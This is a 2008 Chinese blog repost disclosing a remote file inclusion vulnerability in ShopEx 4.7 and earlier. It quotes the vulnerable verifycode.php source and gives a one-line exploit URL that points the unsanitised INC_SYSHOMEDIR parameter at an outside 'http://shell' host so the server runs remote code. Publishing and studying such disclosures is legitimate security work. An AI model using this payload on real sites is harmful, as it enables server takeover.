数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

ShopEx PHP远程包含漏洞
樱木花盗 发表于 2008-3-19 16:30:19

转马骏的 http://www.cngxr.cn/blog.php?do-showone-uid-8-type-blog-itemid-280.html

影响版本:4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <develop@shopex.cn>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP"))
{
Header("Location:../index.php");
exit;
}
/* 调用 session 文件 */
include_once($INC_SYSHOMEDIR."include/session.inc.php");

mt_srand((double)microtime() * 1000000);
/* 生成验证码 */
$strValidate = mt_rand(1000, 9999);
session_unregister("RANDOM_CODE");
session_register("RANDOM_CODE");
$_SESSION["RANDOM_CODE"] = $strValidate."";
$verifyImg = newclass("verifyCode", $strValidate);

/* 输出验证码图片 */
$verifyImg->Output();
?>

Exp: shop/verifycode.php?INC_SYSHOMEDIR=http://shell?


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.